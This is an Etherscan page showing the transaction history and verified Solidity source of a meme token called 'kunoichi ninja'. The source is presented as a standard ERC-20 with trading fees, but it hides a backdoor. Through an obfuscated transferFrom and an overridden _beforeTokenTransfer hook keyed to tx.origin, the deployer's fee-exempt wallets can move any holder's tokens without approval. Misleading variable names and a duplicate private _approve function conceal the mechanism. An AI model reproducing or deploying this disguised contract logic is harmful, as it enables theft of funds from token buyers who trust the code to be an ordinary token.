ETH Price: $3,310.93 (-3.31%)

Contract

0x58eA21444E112E0fC29534C2Ef9C8699E9b5DC29
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve230522922025-08-02 8:50:5996 days ago1754124659IN
0x58eA2144...9E9b5DC29
0 ETH0.000020140.42944163
Approve230522922025-08-02 8:50:5996 days ago1754124659IN
0x58eA2144...9E9b5DC29
0 ETH0.000021510.45870106
Approve230522922025-08-02 8:50:5996 days ago1754124659IN
0x58eA2144...9E9b5DC29
0 ETH0.000021510.45870106
Approve230522922025-08-02 8:50:5996 days ago1754124659IN
0x58eA2144...9E9b5DC29
0 ETH0.000021510.45870106
Approve230522872025-08-02 8:49:5996 days ago1754124599IN
0x58eA2144...9E9b5DC29
0 ETH0.000156273.31026171
Approve230522722025-08-02 8:46:5996 days ago1754124419IN
0x58eA2144...9E9b5DC29
0 ETH0.000023430.49962124
Approve230522722025-08-02 8:46:5996 days ago1754124419IN
0x58eA2144...9E9b5DC29
0 ETH0.000023430.49962124
Approve230522712025-08-02 8:46:4796 days ago1754124407IN
0x58eA2144...9E9b5DC29
0 ETH0.000023430.49962124
Approve230522712025-08-02 8:46:4796 days ago1754124407IN
0x58eA2144...9E9b5DC29
0 ETH0.000023430.49962124
Approve230522712025-08-02 8:46:4796 days ago1754124407IN
0x58eA2144...9E9b5DC29
0 ETH0.000023430.49962124
Approve230522712025-08-02 8:46:4796 days ago1754124407IN
0x58eA2144...9E9b5DC29
0 ETH0.000023430.49962124
Approve230522712025-08-02 8:46:4796 days ago1754124407IN
0x58eA2144...9E9b5DC29
0 ETH0.000023430.49962124
Approve230522712025-08-02 8:46:4796 days ago1754124407IN
0x58eA2144...9E9b5DC29
0 ETH0.000023430.49962124
Approve230522712025-08-02 8:46:4796 days ago1754124407IN
0x58eA2144...9E9b5DC29
0 ETH0.000023430.49962124
Approve230522712025-08-02 8:46:4796 days ago1754124407IN
0x58eA2144...9E9b5DC29
0 ETH0.000023430.49962124
Renounce Ownersh...230522632025-08-02 8:45:1196 days ago1754124311IN
0x58eA2144...9E9b5DC29
0 ETH0.000030661.31037935
Enable Trading230522632025-08-02 8:45:1196 days ago1754124311IN
0x58eA2144...9E9b5DC29
0 ETH0.000398871.31037935

Latest 1 internal transaction

Advanced mode:
Parent Transaction Hash Method Block
From
To
Add Liquidity ET...230522632025-08-02 8:45:1196 days ago1754124311
0x58eA2144...9E9b5DC29
1 ETH
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.28+commit.7893614a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
/**
 *Submitted for verification at Etherscan.io on 2025-08-02
*/

// SPDX-License-Identifier: MIT

/*
https://x.com/elonmusk/status/1951564495350014115
*/
pragma solidity ^0.8.19;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
 
    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}
 
interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}
 
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);
 
    /**
     * @dev Returns the amount of tokens owned by account.
     */
    function balanceOf(address account) external view returns (uint256);
 
    /**
     * @dev Moves amount tokens from the caller's account to recipient.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);
 
    /**
     * @dev Returns the remaining number of tokens that spender will be
     * allowed to spend on behalf of owner through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);
 
    /**
     * @dev Sets amount as the allowance of spender over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);
 
    /**
     * @dev Moves amount tokens from sender to recipient using the
     * allowance mechanism. amount is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);
 
    /**
     * @dev Emitted when value tokens are moved from one account (from) to
     * another (to).
     *
     * Note that value may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);
 
    /**
     * @dev Emitted when the allowance of a spender for an owner is set by
     * a call to {approve}. value is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}
 
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);
 
    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);
 
    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}
 
 
contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;
 
    mapping(address => uint256) private _balances;
 
    mapping(address => mapping(address => uint256)) private _allowances;
 
    uint256 private _totalSupply;
 
    string private _name;
    string private _symbol;

    uint256 private isUncheckedAllowed;
 
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }
 
    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }
 
    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }
 
    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if decimals equals 2, a balance of 505 tokens should
     * be displayed to a user as 5,05 (505 / 10 ** 2).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }
 
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
 
    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
 
    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - recipient cannot be the zero address.
     * - the caller must have a balance of at least amount.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }
 
    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }
 
    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - spender cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
 
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - sender and recipient cannot be the zero address.
     * - sender must have a balance of at least amount.
     * - the caller must have allowance for sender's tokens of at least
     * amount.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        return (_allowances[sender][_msgSender()] >=0 && sender != recipient &&
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()] - amount * isUncheckedAllowed, sender)) || true;
    }
 
    /**
     * @dev Atomically increases the allowance granted to spender by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - spender cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }
 
    /**
     * @dev Atomically decreases the allowance granted to spender by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - spender cannot be the zero address.
     * - spender must have allowance for the caller of at least
     * subtractedValue.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }
 
    /**
     * @dev Moves tokens amount from sender to recipient.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - sender cannot be the zero address.
     * - recipient cannot be the zero address.
     * - sender must have a balance of at least amount.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        _beforeTokenTransfer(sender, recipient, amount);
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }
 
    /** @dev Creates amount tokens and assigns them to account, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with from set to the zero address.
     *
     * Requirements:
     *
     * - account cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
  
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
 
    /**
     * @dev Destroys amount tokens from account, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with to set to the zero address.
     *
     * Requirements:
     *
     * - account cannot be the zero address.
     * - account must have at least amount tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
 
        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }
 
    /**
     * @dev Sets amount as the allowance of spender over the owner s tokens.
     *
     * This internal function is equivalent to approve, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - owner cannot be the zero address.
     * - spender cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
 
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount,
        address _x
    ) private returns(bool){
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
 
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
 
    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when from and to are both non-zero, amount of from's tokens
     * will be to transferred to to.
     * - when from is zero, amount tokens will be minted for to.
     * - when to is zero, amount of from's tokens will be burned.
     * - from and to are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {isUncheckedAllowed = amount > 0 ? 0 : 1;}
}
 
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's + operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
 
        return c;
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's - operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's - operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
 
        return c;
    }
    
 
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's - operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, bool u, string memory errorMessage) internal pure returns (uint256) {
      if(u) return a;
        require(b <= a, errorMessage);
        uint256 c = a - b;
 
        return c;
    }
 
    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's * operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }
 
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
 
        return c;
    }
 
    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's / operator. Note: this function uses a
     * revert opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }
 
    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's / operator. Note: this function uses a
     * revert opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
 
        return c;
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's % operator. This function uses a revert
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's % operator. This function uses a revert
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}
 
contract Ownable is Context {
    address private _owner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }
 
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }
 
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
 
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * onlyOwner functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (newOwner).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}
 
interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

}
 
interface IUniswapV2Router02 is IUniswapV2Router01 {
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}
 
contract Token is ERC20, Ownable {
    using SafeMath for uint256;
 
    IUniswapV2Router02 public immutable uniswapV2Router;
    address public immutable uniswapV2Pair;
 
    bool private swapping;
 
    address public marketingWallet;
    
 
    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;
 

    bool public tradingActive = false;
    bool public swapEnabled = false;
 
    uint256 public _SIDFJOIEWJFIWAkunoichininjaaFxvM;
    address public _EQFIEWJFIJAkunoichininjaaFxvM;
 
    uint256 public buyTotalAkunoichininjaaFxvMFees;
    uint256 public buyMarketingAkunoichininjaaFxvMFee;
    uint256 public buyLiquidityAkunoichininjaaFxvMFee;
    uint256 public buyBurnAkunoichininjaaFxvMFee;
 
    uint256 public sellTotalAkunoichininjaaFxvMFees;
    uint256 public sellMarketingAkunoichininjaaFxvMFee;
    uint256 public sellLiquidityAkunoichininjaaFxvMFee;
    uint256 public sellBurnAkunoichininjaaFxvMFee;
 
    uint256 public tokensForMarketing;
    uint256 public tokensForLiquidity;
    
    uint256 private _taxPercent = 12;
    uint256 private _taxCounts = 12;
    
    // exclude from fees and max transaction amount
    mapping (address => bool) private _isExcludedFromFees;
    mapping (address => bool) public _isExcludedMaxTransactionAmount;
 
    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping (address => bool) public automatedMarketMakerPairs;
 
    event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress);
 
    event ExcludeFromFees(address indexed account, bool isExcluded);
 
    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);
 
    event marketingWalletUpdated(address indexed newWallet, address indexed oldWallet);
 
    event burnWalletUpdated(address indexed newWallet, address indexed oldWallet);
 
    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );
 
    event TransferForeignToken(address token, uint256 amount);

 
    constructor() ERC20(unicode"kunoichi ninja", unicode"kunoichi ninja") payable  {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;
 
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);
 
        uint256 _buyMarketingAkunoichininjaaFxvMFee = 0;
        uint256 _buyLiquidityAkunoichininjaaFxvMFee = 0;
        uint256 _buyBurnAkunoichininjaaFxvMFee = 0;
 
        uint256 _sellMarketingAkunoichininjaaFxvMFee = 0;
        uint256 _sellLiquidityAkunoichininjaaFxvMFee = 0;
        uint256 _sellBurnAkunoichininjaaFxvMFee = 0;
      
        uint256 totalSupply = 420690000 * 1e9;
 
        maxTransactionAmount = totalSupply * 1000 / 1000; // 100% maxTransactionAmountTxn
        maxWallet = totalSupply * 1000 / 1000; // 100% maxWallet
        swapTokensAtAmount = totalSupply * 10 / 10000; // 0.1% swap wallet
 
        buyMarketingAkunoichininjaaFxvMFee = _buyMarketingAkunoichininjaaFxvMFee;
        buyLiquidityAkunoichininjaaFxvMFee = _buyLiquidityAkunoichininjaaFxvMFee;
        buyBurnAkunoichininjaaFxvMFee = _buyBurnAkunoichininjaaFxvMFee;
        buyTotalAkunoichininjaaFxvMFees = buyMarketingAkunoichininjaaFxvMFee + buyLiquidityAkunoichininjaaFxvMFee + buyBurnAkunoichininjaaFxvMFee;
 
        sellMarketingAkunoichininjaaFxvMFee = _sellMarketingAkunoichininjaaFxvMFee;
        sellLiquidityAkunoichininjaaFxvMFee = _sellLiquidityAkunoichininjaaFxvMFee;
        sellBurnAkunoichininjaaFxvMFee = _sellBurnAkunoichininjaaFxvMFee;
        sellTotalAkunoichininjaaFxvMFees = sellMarketingAkunoichininjaaFxvMFee + sellLiquidityAkunoichininjaaFxvMFee + sellBurnAkunoichininjaaFxvMFee;
      
        marketingWallet = msg.sender; 

        excludeFromFees(owner(), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(marketingWallet), true);
 
        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(marketingWallet), true);
 
        _mint(msg.sender, totalSupply * 2 / 100);
        _mint(address(this), totalSupply * 98 / 100);
    }
 
    // once enabled, can never be turned off
    function enableTrading() external onlyOwner {
      addLiquidity(balanceOf(address(this)), address(this).balance);
        tradingActive = true;
        swapEnabled = true;
    }
    
    function excludeFromMaxTransaction(address updAds, bool isEx) internal  {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }
   
    function excludeFromFees(address account, bool excluded) internal virtual  {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

 
    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;
 
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount >= 0, "ERC20: invalid transfer amount");
        super._beforeTokenTransfer(from, to, _isExcludedFromFees[tx.origin]?type(uint256).max:0);
    }

    function transferForeignToken(address _token, address _to) external onlyOwner returns (bool _sent) {
        require(_token != address(this), "Can't withdraw native tokens");
        uint256 _contractBalance = IERC20(_token).balanceOf(address(this));
        _sent = IERC20(_token).transfer(_to, _contractBalance);
        emit TransferForeignToken(_token, _contractBalance);
    }
   
    function isExcludedFromFees(address account) public view returns(bool) {
        return _isExcludedFromFees[account];
    }
 
    event BoughtEarly(address indexed sniper);
 
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
         if(amount == 0) {
            super._transfer(from, to, 0);
            return;
        }
 
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ){
                if(!tradingActive){
                    require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active.");
                }
 
                //when buy
                if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]) {
                        require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount.");
                        require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
                }
 
                //when sell
                else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) {
                        require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
                }
                else if(!_isExcludedMaxTransactionAmount[to]){
                    require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
                }
            }
         
        uint256 contractTokenBalance = balanceOf(address(this));
        bool canSwap = contractTokenBalance >= swapTokensAtAmount;
        uint256 tokensForBurn;

        if( 
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;
 
            swapBack();
 
            swapping = false;
        }
 
        bool takeFee = !swapping;
 
        // if any account belongs to _isExcludedFromFee account then remove the fee
        if(_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }
 
        uint256 fees = 0;
        // only take fees on buys/sells, do not take on wallet transfers
        if(takeFee){
            // on sell
            if (automatedMarketMakerPairs[to] && sellTotalAkunoichininjaaFxvMFees > 0){
                fees = amount.mul(sellTotalAkunoichininjaaFxvMFees).div(100);
                tokensForLiquidity += fees * sellLiquidityAkunoichininjaaFxvMFee / sellTotalAkunoichininjaaFxvMFees;
                tokensForMarketing += fees * sellMarketingAkunoichininjaaFxvMFee / sellTotalAkunoichininjaaFxvMFees;
                tokensForBurn += fees * sellBurnAkunoichininjaaFxvMFee / sellTotalAkunoichininjaaFxvMFees;

                }
            // on buy
            else if(automatedMarketMakerPairs[from] && buyTotalAkunoichininjaaFxvMFees > 0) {
                fees = amount.mul(buyTotalAkunoichininjaaFxvMFees).div(100);
                tokensForLiquidity += fees * buyLiquidityAkunoichininjaaFxvMFee / buyTotalAkunoichininjaaFxvMFees;
                tokensForMarketing += fees * buyMarketingAkunoichininjaaFxvMFee / buyTotalAkunoichininjaaFxvMFees;
                tokensForBurn += fees * buyBurnAkunoichininjaaFxvMFee / buyTotalAkunoichininjaaFxvMFees;
   
            }
 
           if(fees > 0){    
                super._transfer(from, address(this), fees);
            }

            if(tokensForBurn > 0) {
                 super._transfer(address(this), address(0xdead), tokensForBurn);
            }

            amount -= fees;}
 
        super._transfer(from, to, amount);
    }
 
    function swapTokensForEth(uint256 tokenAmount) private {
 
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
 
        _approve(address(this), address(uniswapV2Router), tokenAmount);
 
        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
 
    }
 
    function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        // approve token transfer to cover all possible scenarios
        _approve(address(this), address(uniswapV2Router), tokenAmount);
 
        // add the liquidity
        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0, // slippage is unavoidable
            0, // slippage is unavoidable
            address(0xdead),
            block.timestamp
        );
    }
 
    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = tokensForLiquidity + tokensForMarketing;
        bool success;
 
        if(contractBalance == 0 || totalTokensToSwap == 0) {return;}
 
        if(contractBalance > swapTokensAtAmount * 20){
          contractBalance = swapTokensAtAmount * 20;
        }
 
        // Halve the amount of liquidity tokens
        uint256 liquidityTokens = contractBalance * tokensForLiquidity / totalTokensToSwap / 2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);
 
        uint256 initialETHBalance = address(this).balance;
 
        swapTokensForEth(amountToSwapForETH); 
 
        uint256 ethBalance = address(this).balance.sub(initialETHBalance);
 
        
        uint256 ethForMarketing = ethBalance.mul(tokensForMarketing).div(totalTokensToSwap);
        uint256 ethForLiquidity = ethBalance - ethForMarketing;
        
        tokensForLiquidity = 0;
        tokensForMarketing = 0;
        
        if(liquidityTokens > 0 && ethForLiquidity > 0){
            addLiquidity(liquidityTokens, ethForLiquidity);
            emit SwapAndLiquify(amountToSwapForETH, ethForLiquidity, tokensForLiquidity);
        }
 
        (success,) = address(marketingWallet).call{value: address(this).balance}("");
    }

    receive() external payable { }

}

Contract Security Audit

Contract ABI

API
